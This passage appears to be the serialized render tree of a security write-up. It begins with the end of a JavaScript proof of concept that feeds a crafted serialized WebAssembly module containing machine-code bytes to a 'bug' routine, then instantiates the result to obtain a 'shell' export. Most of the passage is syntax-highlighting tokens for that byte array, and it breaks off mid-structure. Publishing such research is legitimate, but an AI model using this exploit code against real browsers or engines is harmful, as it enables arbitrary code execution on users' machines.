0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 4, 56, 0, 0, 0, 44, 0, 0, 0, 56, 0, 0, 0, 56, 0,\n 0, 0, 56, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2, 95, 36, 3, 213, 16, 1, 128, 210, 127, 35, 3,\n 213, 231, 67, 190, 169, 253, 123, 1, 169, 253, 67, 0, 145, 191, 3, 0, 145, 253, 123, 193, 168,\n 255, 35, 3, 213, 192, 3, 95, 214, 31, 32, 3, 213, 4, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 92, 50, 162, 0,\n ]);\n let r = bug(wasm_code, buffer.buffer);\n result = (await r.next()).value;\n console.log('DeserializeWasmModule result: ' + result);\n const wasm_instance = new WebAssembly.Instance(result);\n const f = wasm_instance.exports.shell;\n console.log(f);\n})();\n",[144034],{"type":24,"tag":145,"props":144035,"children":144036},{"__ignoreMap":7},[144037,144060,144087,144306,144373,144380,144407,144618,144869,145120,145344,145526,145747,145825,145832,145879,145922,145958,146001,146040,146067],{"type":24,"tag":301,"props":144038,"children":144039},{"class":303,"line":304},[144040,144044,144048,144052,144056],{"type":24,"tag":301,"props":144041,"children":144042},{"style":359},[144043],{"type":30,"value":362},{"type":24,"tag":301,"props":144045,"children":144046},{"style":348},[144047],{"type":30,"value":4919},{"type":24,"tag":301,"props":144049,"children":144050},{"style":359},[144051],{"type":30,"value":46432},{"type":24,"tag":301,"props":144053,"children":144054},{"style":348},[144055],{"type":30,"value":4841},{"type":24,"tag":301,"props":144057,"children":144058},{"style":359},[144059],{"type":30,"value":3035},{"type":24,"tag":301,"props":144061,"children":144062},{"class":303,"line":320},[144063,144067,144071,144075,144079,144083],{"type":24,"tag":301,"props":144064,"children":144065},{"style":348},[144066],{"type":30,"value":42931},{"type":24,"tag":301,"props":144068,"children":144069},{"style":369},[144070],{"type":30,"value":140126},{"type":24,"tag":301,"props":144072,"children":144073},{"style":385},[144074],{"type":30,"value":2537},{"type":24,"tag":301,"props":144076,"children":144077},{"style":348},[144078],{"type":30,"value":38685},{"type":24,"tag":301,"props":144080,"children":144081},{"style":314},[144082],{"type":30,"value":140139},{"type":24,"tag":301,"props":144084,"children":144085},{"style":359},[144086],{"type":30,"value":140144},{"type":24,"tag":301,"props":144088,"children":144089},{"class":303,"line":335},[144090,144094,144098,144102,144106,144110,144114,144118,144122,144126,144130,144134,144138,144142,144146,144150,144154,144158,144162,144166,144170,144174,144178,144182,144186,144190,144194,144198,144202,144206,144210,144214,144218,144222,144226,144230,144234,144238,144242,144246,144250,144254,144258,144262,144266,144270,144274,144278,144282,144286,144290,144294,144298,144302],{"type":24,"tag":301,"props":144091,"children":144092},{"style":466},[144093],{"type":30,"value":140869},{"type":24,"tag":301,"props":144095,"children":144096},{"style":359},[144097],{"type":30,"value":377},{"type":24,"tag":301,"props":144099,"children":144100},{"style":466},[144101],{"type":30,"value":140161},{"type":24,"tag":301,"props":144103,"children":144104},{"style":359},[144105],{"type":30,"value":377},{"type":24,"tag":301,"props":144107,"children":144108},{"style":466},[144109],{"type":30,"value":140170},{"type":24,"tag":301,"props":144111,"children":144112},{"style":359},[144113],{"type":30,"value":377},{"type":24,"tag":301,"props":144115,"children":144116},{"style":466},[144117],{"type":30,"value":140179},{"type":24,"tag":301,"props":144119,"children":144120},{"style":359},[144121],{"type":30,"value":377},{"type":24,"tag":301,"props":144123,"children":144124},{"style":466},[144125],{"type":30,"value":546},{"type":24,"tag":301,"props":144127,"children":144128},{"style":359},[144129],{"type":30,"value":377},{"type":24,"tag":301,"props":144131,"children":144132},{"style":466},[144133],{"type":30,"value":584},{"type":24,"tag":301,"props":144135,"children":144136},{"style":359},[144137],{"type":30,"value":377},{"type":24,"tag":301,"props":144139,"children":144140},{"style":466},[144141],{"type":30,"value":584},{"type":24,"tag":301,"props":144143,"children":144144},{"style":359},[144145],{"type":30,"value":377},{"type":24,"tag":301,"props":144147,"children":144148},{"style":466},[144149],{"type":30,"value":584},{"type":24,"tag":301,"props":144151,"children":144152},{"style":359},[144153],{"type":30,"value":377},{"type":24,"tag":301,"props":144155,"children":144156},{"style":466},[144157],{"type":30,"value":546},{"type":24,"tag":301,"props":144159,"children":144160},{"style":359},[144161],{"type":30,"value":377},{"type":24,"tag":301,"props":144163,"children":144164},{"style":466},[144165],{"type":30,"value":1761},{"type":24,"tag":301,"props":144167,"children":144168},{"style":359},[144169],{"type":30,"value":377},{"type":24,"tag":301,"props":144171,"children":144172},{"style":466},[144173],{"type":30,"value":546},{"type":24,"tag":301,"props":144175,"children":144176},{"style":359},[144177],{"type":30,"value":377},{"type":24,"tag":301,"props":144179,"children":144180},{"style":466},[144181],{"type":30,"value":140244},{"type":24,"tag":301,"props":144183,"children":144184},{"style":359},[144185],{"type":30,"value":377},{"type":24,"tag":301,"props":144187,"children":144188},{"style":466},[144189],{"type":30,"value":584},{"type":24,"tag":301,"props":144191,"children":144192},{"style":359},[144193],{"type":30,"value":377},{"type":24,"tag":301,"props":144195,"children":144196},{"style":466},[144197],{"type":30,"value":584},{"type":24,"tag":301,"props":144199,"children":144200},{"style":359},[144201],{"type":30,"value":377},{"type":24,"tag":301,"props":144203,"children":144204},{"style":466},[144205],{"type":30,"value":1447},{"type":24,"tag":301,"props":144207,"children":144208},{"style":359},[144209],{"type":30,"value":377},{"type":24,"tag":301,"props":144211,"children":144212},{"style":466},[144213],{"type":30,"value":1503},{"type":24,"tag":301,"props":144215,"children":144216},{"style":359},[144217],{"type":30,"value":377},{"type":24,"tag":301,"props":144219,"children":144220},{"style":466},[144221],{"type":30,"value":546},{"type":24,"tag":301,"props":144223,"children":144224},{"style":359},[144225],{"type":30,"value":377},{"type":24,"tag":301,"props":144227,"children":144228},{"style":466},[144229],{"type":30,"value":584},{"type":24,"tag":301,"props":144231,"children":144232},{"style":359},[144233],{"type":30,"value":377},{"type":24,"tag":301,"props":144235,"children":144236},{"style":466},[144237],{"type":30,"value":61393},{"type":24,"tag":301,"props":144239,"children":144240},{"style":359},[144241],{"type":30,"value":377},{"type":24,"tag":301,"props":144243,"children":144244},{"style":466},[144245],{"type":30,"value":62606},{"type":24,"tag":301,"props":144247,"children":144248},{"style":359},[144249],{"type":30,"value":377},{"type":24,"tag":301,"props":144251,"children":144252},{"style":466},[144253],{"type":30,"value":546},{"type":24,"tag":301,"props":144255,"children":144256},{"style":359},[144257],{"type":30,"value":377},{"type":24,"tag":301,"props":144259,"children":144260},{"style":466},[144261],{"type":30,"value":24886},{"type":24,"tag":301,"props":144263,"children":144264},{"style":359},[144265],{"type":30,"value":377},{"type":24,"tag":301,"props":144267,"children":144268},{"style":466},[144269],{"type":30,"value":140170},{"type":24,"tag":301,"props":144271,"children":144272},{"style":359},[144273],{"type":30,"value":377},{"type":24,"tag":301,"props":144275,"children":144276},{"style":466},[144277],{"type":30,"value":140341},{"type":24,"tag":301,"props":144279,"children":144280},{"style":359},[144281],{"type":30,"value":377},{"type":24,"tag":301,"props":144283,"children":144284},{"style":466},[144285],{"type":30,"value":140350},{"type":24,"tag":301,"props":144287,"children":144288},{"style":359},[144289],{"type":30,"value":377},{"type":24,"tag":301,"props":144291,"children":144292},{"style":466},[144293],{"type":30,"value":140359},{"type":24,"tag":301,"props":144295,"children":144296},{"style":359},[144297],{"type":30,"value":377},{"type":24,"tag":301,"props":144299,"children":144300},{"style":466},[144301],{"type":30,"value":140359},{"type":24,"tag":301,"props":144303,"children":144304},{"style":359},[144305],{"type":30,"value":1729},{"type":24,"tag":301,"props":144307,"children":144308},{"class":303,"line":344},[144309,144313,144317,144321,144325,144329,144333,144337,144341,144345,144349,144353,144357,144361,144365,144369],{"type":24,"tag":301,"props":144310,"children":144311},{"style":466},[144312],{"type":30,"value":140869},{"type":24,"tag":301,"props":144314,"children":144315},{"style":359},[144316],{"type":30,"value":377},{"type":24,"tag":301,"props":144318,"children":144319},{"style":466},[144320],{"type":30,"value":584},{"type":24,"tag":301,"props":144322,"children":144323},{"style":359},[144324],{"type":30,"value":377},{"type":24,"tag":301,"props":144326,"children":144327},{"style":466},[144328],{"type":30,"value":9505},{"type":24,"tag":301,"props":144330,"children":144331},{"style":359},[144332],{"type":30,"value":377},{"type":24,"tag":301,"props":144334,"children":144335},{"style":466},[144336],{"type":30,"value":1761},{"type":24,"tag":301,"props":144338,"children":144339},{"style":359},[144340],{"type":30,"value":377},{"type":24,"tag":301,"props":144342,"children":144343},{"style":466},[144344],{"type":30,"value":546},{"type":24,"tag":301,"props":144346,"children":144347},{"style":359},[144348],{"type":30,"value":377},{"type":24,"tag":301,"props":144350,"children":144351},{"style":466},[144352],{"type":30,"value":1503},{"type":24,"tag":301,"props":144354,"children":144355},{"style":359},[144356],{"type":30,"value":377},{"type":24,"tag":301,"props":144358,"children":144359},{"style":466},[144360],{"type":30,"value":584},{"type":24,"tag":301,"props":144362,"children":144363},{"style":359},[144364],{"type":30,"value":377},{"type":24,"tag":301,"props":144366,"children":144367},{"style":466},[144368],{"type":30,"value":140435},{"type":24,"tag":301,"props":144370,"children":144371},{"style":359},[144372],{"type":30,"value":1729},{"type":24,"tag":301,"props":144374,"children":144375},{"class":303,"line":401},[144376],{"type":24,"tag":301,"props":144377,"children":144378},{"style":359},[144379],{"type":30,"value":141156},{"type":24,"tag":301,"props":144381,"children":144382},{"class":303,"line":415},[144383,144387,144391,144395,144399,144403],{"type":24,"tag":301,"props":144384,"children":144385},{"style":348},[144386],{"type":30,"value":42931},{"type":24,"tag":301,"props":144388,"children":144389},{"style":369},[144390],{"type":30,"value":131953},{"type":24,"tag":301,"props":144392,"children":144393},{"style":385},[144394],{"type":30,"value":2537},{"type":24,"tag":301,"props":144396,"children":144397},{"style":348},[144398],{"type":30,"value":38685},{"type":24,"tag":301,"props":144400,"children":144401},{"style":314},[144402],{"type":30,"value":140139},{"type":24,"tag":301,"props":144404,"children":144405},{"style":359},[144406],{"type":30,"value":140144},{"type":24,"tag":301,"props":144408,"children":144409},{"class":303,"line":439},[144410,144415,144419,144423,144427,144431,144435,144439,144443,144448,144452,144457,144461,144466,144470,144475,144479,144483,144487,144491,144495,144499,144503,144507,144511,144516,144520,144525,144529,144534,144538,144542,144546,144550,144554,144558,144562,144566,144570,144574,144578,144582,144586,144590,144594,144598,144602,144606,144610,144614],{"type":24,"tag":301,"props":144411,"children":144412},{"style":466},[144413],{"type":30,"value":144414}," 146",{"type":24,"tag":301,"props":144416,"children":144417},{"style":359},[144418],{"type":30,"value":377},{"type":24,"tag":301,"props":144420,"children":144421},{"style":466},[144422],{"type":30,"value":25198},{"type":24,"tag":301,"props":144424,"children":144425},{"style":359},[144426],{"type":30,"value":377},{"type":24,"tag":301,"props":144428,"children":144429},{"style":466},[144430],{"type":30,"value":141208},{"type":24,"tag":301,"props":144432,"children":144433},{"style":359},[144434],{"type":30,"value":377},{"type":24,"tag":301,"props":144436,"children":144437},{"style":466},[144438],{"type":30,"value":141217},{"type":24,"tag":301,"props":144440,"children":144441},{"style":359},[144442],{"type":30,"value":377},{"type":24,"tag":301,"props":144444,"children":144445},{"style":466},[144446],{"type":30,"value":144447},"174",{"type":24,"tag":301,"props":144449,"children":144450},{"style":359},[144451],{"type":30,"value":377},{"type":24,"tag":301,"props":144453,"children":144454},{"style":466},[144455],{"type":30,"value":144456},"122",{"type":24,"tag":301,"props":144458,"children":144459},{"style":359},[144460],{"type":30,"value":377},{"type":24,"tag":301,"props":144462,"children":144463},{"style":466},[144464],{"type":30,"value":144465},"171",{"type":24,"tag":301,"props":144467,"children":144468},{"style":359},[144469],{"type":30,"value":377},{"type":24,"tag":301,"props":144471,"children":144472},{"style":466},[144473],{"type":30,"value":144474},"151",{"type":24,"tag":301,"props":144476,"children":144477},{"style":359},[144478],{"type":30,"value":377},{"type":24,"tag":301,"props":144480,"children":144481},{"style":466},[144482],{"type":30,"value":103364},{"type":24,"tag":301,"props":144484,"children":144485},{"style":359},[144486],{"type":30,"value":377},{"type":24,"tag":301,"props":144488,"children":144489},{"style":466},[144490],{"type":30,"value":584},{"type":24,"tag":301,"props":144492,"children":144493},{"style":359},[144494],{"type":30,"value":377},{"type":24,"tag":301,"props":144496,"children":144497},{"style":466},[144498],{"type":30,"value":584},{"type":24,"tag":301,"props":144500,"children":144501},{"style":359},[144502],{"type":30,"value":377},{"type":24,"tag":301,"props":144504,"children":144505},{"style":466},[144506],{"type":30,"value":584},{"type":24,"tag":301,"props":144508,"children":144509},{"style":359},[144510],{"type":30,"value":377},{"type":24,"tag":301,"props":144512,"children":144513},{"style":466},[144514],{"type":30,"value":144515},"39",{"type":24,"tag":301,"props":144517,"children":144518},{"style":359},[144519],{"type":30,"value":377},{"type":24,"tag":301,"props":144521,"children":144522},{"style":466},[144523],{"type":30,"value":144524},"61",{"type":24,"tag":301,"props":144526,"children":144527},{"style":359},[144528],{"type":30,"value":377},{"type":24,"tag":301,"props":144530,"children":144531},{"style":466},[144532],{"type":30,"value":144533},"60",{"type":24,"tag":301,"props":144535,"children":144536},{"style":359},[144537],{"type":30,"value":377},{"type":24,"tag":301,"props":144539,"children":144540},{"style":466},[144541],{"type":30,"value":103364},{"type":24,"tag":301,"props":144543,"children":144544},{"style":359},[144545],{"type":30,"value":377},{"type":24,"tag":301,"props":144547,"children":144548},{"style":466},[144549],{"type":30,"value":584},{"type":24,"tag":301,"props":144551,"children":144552},{"style":359},[144553],{"type":30,"value":377},{"type":24,"tag":301,"props":144555,"children":144556},{"style":466},[144557],{"type":30,"value":3073},{"type":24,"tag":301,"props":144559,"children":144560},{"style":359},[144561],{"type":30,"value":377},{"type":24,"tag":301,"props":144563,"children":144564},{"style":466},[144565],{"type":30,"value":1447},{"type":24,"tag":301,"props":144567,"children":144568},{"style":359},[144569],{"type":30,"value":377},{"type":24,"tag":301,"props":144571,"children":144572},{"style":466},[144573],{"type":30,"value":584},{"type":24,"tag":301,"props":144575,"children":144576},{"style":359},[144577],{"type":30,"value":377},{"type":24,"tag":301,"props":144579,"children":144580},{"style":466},[144581],{"type":30,"value":584},{"type":24,"tag":301,"props":144583,"children":144584},{"style":359},[144585],{"type":30,"value":377},{"type":24,"tag":301,"props":144587,"children":144588},{"style":466},[144589],{"type":30,"value":584},{"type":24,"tag":301,"props":144591,"children":144592},{"style":359},[144593],{"type":30,"value":377},{"type":24,"tag":301,"props":144595,"children":144596},{"style":466},[144597],{"type":30,"value":584},{"type":24,"tag":301,"props":144599,"children":144600},{"style":359},[144601],{"type":30,"value":377},{"type":24,"tag":301,"props":144603,"children":144604},{"style":466},[144605],{"type":30,"value":584},{"type":24,"tag":301,"props":144607,"children":144608},{"style":359},[144609],{"type":30,"value":377},{"type":24,"tag":301,"props":144611,"children":144612},{"style":466},[144613],{"type":30,"value":36179},{"type":24,"tag":301,"props":144615,"children":144616},{"style":359},[144617],{"type":30,"value":1729},{"type":24,"tag":301,"props":144619,"children":144620},{"class":303,"line":447},[144621,144625,144629,144633,144637,144641,144645,144649,144653,144657,144661,144665,144669,144673,144677,144681,144685,144689,144693,144697,144701,144705,144709,144713,144717,144721,144725,144729,144733,144737,144741,144745,144749,144753,144757,144761,144765,144769,144773,144777,144781,144785,144789,144793,144797,144801,144805,144809,144813,144817,144821,144825,144829,144833,144837,144841,144845,144849,144853,144857,144861,144865],{"type":24,"tag":301,"props":144622,"children":144623},{"style":466},[144624],{"type":30,"value":140869},{"type":24,"tag":301,"props":144626,"children":144627},{"style":359},[144628],{"type":30,"value":377},{"type":24,"tag":301,"props":144630,"children":144631},{"style":466},[144632],{"type":30,"value":584},{"type":24,"tag":301,"props":144634,"children":144635},{"style":359},[144636],{"type":30,"value":377},{"type":24,"tag":301,"props":144638,"children":144639},{"style":466},[144640],{"type":30,"value":584},{"type":24,"tag":301,"props":144642,"children":144643},{"style":359},[144644],{"type":30,"value":377},{"type":24,"tag":301,"props":144646,"children":144647},{"style":466},[144648],{"type":30,"value":584},{"type":24,"tag":301,"props":144650,"children":144651},{"style":359},[144652],{"type":30,"value":377},{"type":24,"tag":301,"props":144654,"children":144655},{"style":466},[144656],{"type":30,"value":584},{"type":24,"tag":301,"props":144658,"children":144659},{"style":359},[144660],{"type":30,"value":377},{"type":24,"tag":301,"props":144662,"children":144663},{"style":466},[144664],{"type":30,"value":584},{"type":24,"tag":301,"props":144666,"children":144667},{"style":359},[144668],{"type":30,"value":377},{"type":24,"tag":301,"props":144670,"children":144671},{"style":466},[144672],{"type":30,"value":584},{"type":24,"tag":301,"props":144674,"children":144675},{"style":359},[144676],{"type":30,"value":377},{"type":24,"tag":301,"props":144678,"children":144679},{"style":466},[144680],{"type":30,"value":546},{"type":24,"tag":301,"props":144682,"children":144683},{"style":359},[144684],{"type":30,"value":377},{"type":24,"tag":301,"props":144686,"children":144687},{"style":466},[144688],{"type":30,"value":584},{"type":24,"tag":301,"props":144690,"children":144691},{"style":359},[144692],{"type":30,"value":377},{"type":24,"tag":301,"props":144694,"children":144695},{"style":466},[144696],{"type":30,"value":584},{"type":24,"tag":301,"props":144698,"children":144699},{"style":359},[144700],{"type":30,"value":377},{"type":24,"tag":301,"props":144702,"children":144703},{"style":466},[144704],{"type":30,"value":584},{"type":24,"tag":301,"props":144706,"children":144707},{"style":359},[144708],{"type":30,"value":377},{"type":24,"tag":301,"props":144710,"children":144711},{"style":466},[144712],{"type":30,"value":584},{"type":24,"tag":301,"props":144714,"children":144715},{"style":359},[144716],{"type":30,"value":377},{"type":24,"tag":301,"props":144718,"children":144719},{"style":466},[144720],{"type":30,"value":584},{"type":24,"tag":301,"props":144722,"children":144723},{"style":359},[144724],{"type":30,"value":377},{"type":24,"tag":301,"props":144726,"children":144727},{"style":466},[144728],{"type":30,"value":584},{"type":24,"tag":301,"props":144730,"children":144731},{"style":359},[144732],{"type":30,"value":377},{"type":24,"tag":301,"props":144734,"children":144735},{"style":466},[144736],{"type":30,"value":584},{"type":24,"tag":301,"props":144738,"children":144739},{"style":359},[144740],{"type":30,"value":377},{"type":24,"tag":301,"props":144742,"children":144743},{"style":466},[144744],{"type":30,"value":584},{"type":24,"tag":301,"props":144746,"children":144747},{"style":359},[144748],{"type":30,"value":377},{"type":24,"tag":301,"props":144750,"children":144751},{"style":466},[144752],{"type":30,"value":1761},{"type":24,"tag":301,"props":144754,"children":144755},{"style":359},[144756],{"type":30,"value":377},{"type":24,"tag":301,"props":144758,"children":144759},{"style":466},[144760],{"type":30,"value":51861},{"type":24,"tag":301,"props":144762,"children":144763},{"style":359},[144764],{"type":30,"value":377},{"type":24,"tag":301,"props":144766,"children":144767},{"style":466},[144768],{"type":30,"value":584},{"type":24,"tag":301,"props":144770,"children":144771},{"style":359},[144772],{"type":30,"value":377},{"type":24,"tag":301,"props":144774,"children":144775},{"style":466},[144776],{"type":30,"value":584},{"type":24,"tag":301,"props":144778,"children":144779},{"style":359},[144780],{"type":30,"value":377},{"type":24,"tag":301,"props":144782,"children":144783},{"style":466},[144784],{"type":30,"value":584},{"type":24,"tag":301,"props":144786,"children":144787},{"style":359},[144788],{"type":30,"value":377},{"type":24,"tag":301,"props":144790,"children":144791},{"style":466},[144792],{"type":30,"value":141244},{"type":24,"tag":301,"props":144794,"children":144795},{"style":359},[144796],{"type":30,"value":377},{"type":24,"tag":301,"props":144798,"children":144799},{"style":466},[144800],{"type":30,"value":584},{"type":24,"tag":301,"props":144802,"children":144803},{"style":359},[144804],{"type":30,"value":377},{"type":24,"tag":301,"props":144806,"children":144807},{"style":466},[144808],{"type":30,"value":584},{"type":24,"tag":301,"props":144810,"children":144811},{"style":359},[144812],{"type":30,"value":377},{"type":24,"tag":301,"props":144814,"children":144815},{"style":466},[144816],{"type":30,"value":584},{"type":24,"tag":301,"props":144818,"children":144819},{"style":359},[144820],{"type":30,"value":377},{"type":24,"tag":301,"props":144822,"children":144823},{"style":466},[144824],{"type":30,"value":51861},{"type":24,"tag":301,"props":144826,"children":144827},{"style":359},[144828],{"type":30,"value":377},{"type":24,"tag":301,"props":144830,"children":144831},{"style":466},[144832],{"type":30,"value":584},{"type":24,"tag":301,"props":144834,"children":144835},{"style":359},[144836],{"type":30,"value":377},{"type":24,"tag":301,"props":144838,"children":144839},{"style":466},[144840],{"type":30,"value":584},{"type":24,"tag":301,"props":144842,"children":144843},{"style":359},[144844],{"type":30,"value":377},{"type":24,"tag":301,"props":144846,"children":144847},{"style":466},[144848],{"type":30,"value":584},{"type":24,"tag":301,"props":144850,"children":144851},{"style":359},[144852],{"type":30,"value":377},{"type":24,"tag":301,"props":144854,"children":144855},{"style":466},[144856],{"type":30,"value":51861},{"type":24,"tag":301,"props":144858,"children":144859},{"style":359},[144860],{"type":30,"value":377},{"type":24,"tag":301,"props":144862,"children":144863},{"style":466},[144864],{"type":30,"value":584},{"type":24,"tag":301,"props":144866,"children":144867},{"style":359},[144868],{"type":30,"value":1729},{"type":24,"tag":301,"props":144870,"children":144871},{"class":303,"line":476},[144872,144876,144880,144884,144888,144892,144896,144900,144904,144908,144912,144916,144920,144924,144928,144932,144936,144940,144944,144948,144952,144956,144960,144964,144968,144972,144976,144980,144984,144988,144992,144996,145000,145004,145008,145012,145016,145020,145024,145028,145032,145036,145040,145044,145048,145052,145056,145060,145064,145068,145072,145076,145080,145084,145088,145092,145096,145100,145104,145108,145112,145116],{"type":24,"tag":301,"props":144873,"children":144874},{"style":466},[144875],{"type":30,"value":140869},{"type":24,"tag":301,"props":144877,"children":144878},{"style":359},[144879],{"type":30,"value":377},{"type":24,"tag":301,"props":144881,"children":144882},{"style":466},[144883],{"type":30,"value":584},{"type":24,"tag":301,"props":144885,"children":144886},{"style":359},[144887],{"type":30,"value":377},{"type":24,"tag":301,"props":144889,"children":144890},{"style":466},[144891],{"type":30,"value":51861},{"type":24,"tag":301,"props":144893,"children":144894},{"style":359},[144895],{"type":30,"value":377},{"type":24,"tag":301,"props":144897,"children":144898},{"style":466},[144899],{"type":30,"value":584},{"type":24,"tag":301,"props":144901,"children":144902},{"style":359},[144903],{"type":30,"value":377},{"type":24,"tag":301,"props":144905,"children":144906},{"style":466},[144907],{"type":30,"value":584},{"type":24,"tag":301,"props":144909,"children":144910},{"style":359},[144911],{"type":30,"value":377},{"type":24,"tag":301,"props":144913,"children":144914},{"style":466},[144915],{"type":30,"value":584},{"type":24,"tag":301,"props":144917,"children":144918},{"style":359},[144919],{"type":30,"value":377},{"type":24,"tag":301,"props":144921,"children":144922},{"style":466},[144923],{"type":30,"value":1761},{"type":24,"tag":301,"props":144925,"children":144926},{"style":359},[144927],{"type":30,"value":377},{"type":24,"tag":301,"props":144929,"children":144930},{"style":466},[144931],{"type":30,"value":584},{"type":24,"tag":301,"props":144933,"children":144934},{"style":359},[144935],{"type":30,"value":377},{"type":24,"tag":301,"props":144937,"children":144938},{"style":466},[144939],{"type":30,"value":584},{"type":24,"tag":301,"props":144941,"children":144942},{"style":359},[144943],{"type":30,"value":377},{"type":24,"tag":301,"props":144945,"children":144946},{"style":466},[144947],{"type":30,"value":584},{"type":24,"tag":301,"props":144949,"children":144950},{"style":359},[144951],{"type":30,"value":377},{"type":24,"tag":301,"props":144953,"children":144954},{"style":466},[144955],{"type":30,"value":584},{"type":24,"tag":301,"props":144957,"children":144958},{"style":359},[144959],{"type":30,"value":377},{"type":24,"tag":301,"props":144961,"children":144962},{"style":466},[144963],{"type":30,"value":584},{"type":24,"tag":301,"props":144965,"children":144966},{"style":359},[144967],{"type":30,"value":377},{"type":24,"tag":301,"props":144969,"children":144970},{"style":466},[144971],{"type":30,"value":584},{"type":24,"tag":301,"props":144973,"children":144974},{"style":359},[144975],{"type":30,"value":377},{"type":24,"tag":301,"props":144977,"children":144978},{"style":466},[144979],{"type":30,"value":584},{"type":24,"tag":301,"props":144981,"children":144982},{"style":359},[144983],{"type":30,"value":377},{"type":24,"tag":301,"props":144985,"children":144986},{"style":466},[144987],{"type":30,"value":584},{"type":24,"tag":301,"props":144989,"children":144990},{"style":359},[144991],{"type":30,"value":377},{"type":24,"tag":301,"props":144993,"children":144994},{"style":466},[144995],{"type":30,"value":584},{"type":24,"tag":301,"props":144997,"children":144998},{"style":359},[144999],{"type":30,"value":377},{"type":24,"tag":301,"props":145001,"children":145002},{"style":466},[145003],{"type":30,"value":584},{"type":24,"tag":301,"props":145005,"children":145006},{"style":359},[145007],{"type":30,"value":377},{"type":24,"tag":301,"props":145009,"children":145010},{"style":466},[145011],{"type":30,"value":584},{"type":24,"tag":301,"props":145013,"children":145014},{"style":359},[145015],{"type":30,"value":377},{"type":24,"tag":301,"props":145017,"children":145018},{"style":466},[145019],{"type":30,"value":36179},{"type":24,"tag":301,"props":145021,"children":145022},{"style":359},[145023],{"type":30,"value":377},{"type":24,"tag":301,"props":145025,"children":145026},{"style":466},[145027],{"type":30,"value":584},{"type":24,"tag":301,"props":145029,"children":145030},{"style":359},[145031],{"type":30,"value":377},{"type":24,"tag":301,"props":145033,"children":145034},{"style":466},[145035],{"type":30,"value":584},{"type":24,"tag":301,"props":145037,"children":145038},{"style":359},[145039],{"type":30,"value":377},{"type":24,"tag":301,"props":145041,"children":145042},{"style":466},[145043],{"type":30,"value":584},{"type":24,"tag":301,"props":145045,"children":145046},{"style":359},[145047],{"type":30,"value":377},{"type":24,"tag":301,"props":145049,"children":145050},{"style":466},[145051],{"type":30,"value":584},{"type":24,"tag":301,"props":145053,"children":145054},{"style":359},[145055],{"type":30,"value":377},{"type":24,"tag":301,"props":145057,"children":145058},{"style":466},[145059],{"type":30,"value":584},{"type":24,"tag":301,"props":145061,"children":145062},{"style":359},[145063],{"type":30,"value":377},{"type":24,"tag":301,"props":145065,"children":145066},{"style":466},[145067],{"type":30,"value":584},{"type":24,"tag":301,"props":145069,"children":145070},{"style":359},[145071],{"type":30,"value":377},{"type":24,"tag":301,"props":145073,"children":145074},{"style":466},[145075],{"type":30,"value":584},{"type":24,"tag":301,"props":145077,"children":145078},{"style":359},[145079],{"type":30,"value":377},{"type":24,"tag":301,"props":145081,"children":145082},{"style":466},[145083],{"type":30,"value":584},{"type":24,"tag":301,"props":145085,"children":145086},{"style":359},[145087],{"type":30,"value":377},{"type":24,"tag":301,"props":145089,"children":145090},{"style":466},[145091],{"type":30,"value":584},{"type":24,"tag":301,"props":145093,"children":145094},{"style":359},[145095],{"type":30,"value":377},{"type":24,"tag":301,"props":145097,"children":145098},{"style":466},[145099],{"type":30,"value":584},{"type":24,"tag":301,"props":145101,"children":145102},{"style":359},[145103],{"type":30,"value":377},{"type":24,"tag":301,"props":145105,"children":145106},{"style":466},[145107],{"type":30,"value":584},{"type":24,"tag":301,"props":145109,"children":145110},{"style":359},[145111],{"type":30,"value":377},{"type":24,"tag":301,"props":145113,"children":145114},{"style":466},[145115],{"type":30,"value":584},{"type":24,"tag":301,"props":145117,"children":145118},{"style":359},[145119],{"type":30,"value":1729},{"type":24,"tag":301,"props":145121,"children":145122},{"class":303,"line":495},[145123,145127,145131,145135,145139,145143,145147,145151,145155,145159,145163,145167,145171,145175,145179,145183,145187,145191,145195,145199,145203,145207,145211,145215,145219,145223,145227,145231,145235,145239,145243,145247,145251,145256,145260,145265,145269,145273,145277,145282,145286,145290,145294,145298,145302,145306,145310,145315,145319,145323,145327,145332,145336,145340],{"type":24,"tag":301,"props":145124,"children":145125},{"style":466},[145126],{"type":30,"value":140869},{"type":24,"tag":301,"props":145128,"children":145129},{"style":359},[145130],{"type":30,"value":377},{"type":24,"tag":301,"props":145132,"children":145133},{"style":466},[145134],{"type":30,"value":584},{"type":24,"tag":301,"props":145136,"children":145137},{"style":359},[145138],{"type":30,"value":377},{"type":24,"tag":301,"props":145140,"children":145141},{"style":466},[145142],{"type":30,"value":584},{"type":24,"tag":301,"props":145144,"children":145145},{"style":359},[145146],{"type":30,"value":377},{"type":24,"tag":301,"props":145148,"children":145149},{"style":466},[145150],{"type":30,"value":584},{"type":24,"tag":301,"props":145152,"children":145153},{"style":359},[145154],{"type":30,"value":377},{"type":24,"tag":301,"props":145156,"children":145157},{"style":466},[145158],{"type":30,"value":584},{"type":24,"tag":301,"props":145160,"children":145161},{"style":359},[145162],{"type":30,"value":377},{"type":24,"tag":301,"props":145164,"children":145165},{"style":466},[145166],{"type":30,"value":584},{"type":24,"tag":301,"props":145168,"children":145169},{"style":359},[145170],{"type":30,"value":377},{"type":24,"tag":301,"props":145172,"children":145173},{"style":466},[145174],{"type":30,"value":584},{"type":24,"tag":301,"props":145176,"children":145177},{"style":359},[145178],{"type":30,"value":377},{"type":24,"tag":301,"props":145180,"children":145181},{"style":466},[145182],{"type":30,"value":584},{"type":24,"tag":301,"props":145184,"children":145185},{"style":359},[145186],{"type":30,"value":377},{"type":24,"tag":301,"props":145188,"children":145189},{"style":466},[145190],{"type":30,"value":584},{"type":24,"tag":301,"props":145192,"children":145193},{"style":359},[145194],{"type":30,"value":377},{"type":24,"tag":301,"props":145196,"children":145197},{"style":466},[145198],{"type":30,"value":584},{"type":24,"tag":301,"props":145200,"children":145201},{"style":359},[145202],{"type":30,"value":377},{"type":24,"tag":301,"props":145204,"children":145205},{"style":466},[145206],{"type":30,"value":584},{"type":24,"tag":301,"props":145208,"children":145209},{"style":359},[145210],{"type":30,"value":377},{"type":24,"tag":301,"props":145212,"children":145213},{"style":466},[145214],{"type":30,"value":584},{"type":24,"tag":301,"props":145216,"children":145217},{"style":359},[145218],{"type":30,"value":377},{"type":24,"tag":301,"props":145220,"children":145221},{"style":466},[145222],{"type":30,"value":584},{"type":24,"tag":301,"p